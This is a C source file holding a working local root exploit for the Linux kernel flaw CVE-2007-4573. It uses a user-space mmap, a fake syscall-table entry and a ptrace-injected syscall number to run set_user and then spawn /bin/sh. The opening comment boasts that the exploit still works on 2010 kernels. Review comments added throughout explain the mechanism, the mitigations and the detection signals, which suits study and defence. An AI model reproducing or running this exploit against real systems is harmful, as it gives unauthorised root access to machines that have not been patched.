// CVE-2007-4573 mod -yes,this CAN exploit 2010!
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>
/* NOTE(review): kill() and SIGSTOP (used in main) are declared in <signal.h>,
 * which is not included; on a strict compiler this is an implicit declaration. */
/*
* Replace these with the values of `ia32_sys_call_table' and
* `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
*/
#define syscall_table 0xffffffff8044b8a0
#define set_user 0xffffffff8028d785
/* A "syscall number" whose low 32 bits are all zero but which is non-zero
 * as a 64-bit value.  The defect this code relies on is a compat entry path
 * that range-checks only the low 32 bits of the number yet indexes the
 * table with the full register; patched kernels zero-extend/mask it. */
#define offset (1L << 32)
/* syscall_table + 8 * offset.  The sum wraps modulo 2^64: with the sample
 * address above it evaluates to 0x000000078044b8a0, i.e. a user-space
 * address the process can map itself (see the mmap in main).  That is why
 * a bogus table index turns into a read of attacker-controlled memory. */
#define landing (syscall_table + 8*offset)
/*
 * Entry point.  As written: map a page at `landing', store the address of
 * set_user in it, then fork a child that enters the 32-bit syscall path
 * (int $0x80) while the parent, acting as its ptrace tracer, rewrites the
 * child's syscall number to `offset' before letting it continue.
 *
 * No ptrace()/wait()/fork() return value is checked, so on a patched kernel
 * (index masked) or with ptrace restricted (e.g. Yama ptrace_scope) the
 * child simply falls through to execl() with its original privileges.
 * Hiding kernel symbol addresses (kptr_restrict) removes the other input
 * this file asks for.  From a detection standpoint the sequence is
 * distinctive: a 64-bit process issuing int $0x80, a MAP_FIXED RWX
 * anonymous mapping at a fixed low user address, and a tracer writing an
 * orig_rax value above 2^32 into a child.
 */
int main() {
/* Map the 4 KiB page containing `landing' read/write/exec at a fixed
 * address.  Failure (MAP_FAILED, tested via the sign of the cast) is the
 * only error this program reports. */
if((signed long)mmap((void*)(landing&~0xFFF), 4096,
PROT_READ|PROT_EXEC|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
0, 0) < 0) { // can make this 'not necessary' - use the other 2010 and some 2009 to work THAT out ;)
perror("mmap");
exit(-1);
}
/* The user-space "table slot" the kernel would read for index `offset'
 * now holds the address of set_user. */
*(long*)landing = set_user;
pid_t child;
/* NOTE(review): fork() failure (-1) is not handled; it would be treated as
 * the parent branch with child == -1. */
child = fork();
if(child == 0) {
/* Child: request tracing by the parent, stop so the parent can resume us
 * with PTRACE_SYSCALL, then enter the 32-bit syscall path with %ebx = 0
 * (first argument in the i386 ABI).  No number is put in %eax here; the
 * parent supplies it via orig_rax while the child is stopped. */
ptrace(PTRACE_TRACEME, 0, NULL, NULL);
kill(getpid(), SIGSTOP);   /* requires <signal.h>, not included above */
__asm__("movl $0, %ebx\n\t"
"int $0x80\n");
/* Reached whether or not the syscall trick changed anything. */
execl("/bin/sh", "/bin/sh", NULL);
} else {
wait(NULL);   /* child's self-inflicted SIGSTOP */
ptrace(PTRACE_SYSCALL, child, NULL, NULL);
wait(NULL);   /* presumably the syscall-entry stop for the int $0x80 above -- not verified here */
/* Overwrite the stopped child's syscall number (orig_rax) with `offset'
 * (1<<32): the low 32 bits are 0, the upper bits are not. */
ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
(void*)offset);
ptrace(PTRACE_DETACH, child, NULL, NULL);
wait(NULL);   /* reap the child (the shell it exec'd) */
/*
use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
and then detach and let it run.
*/
}
}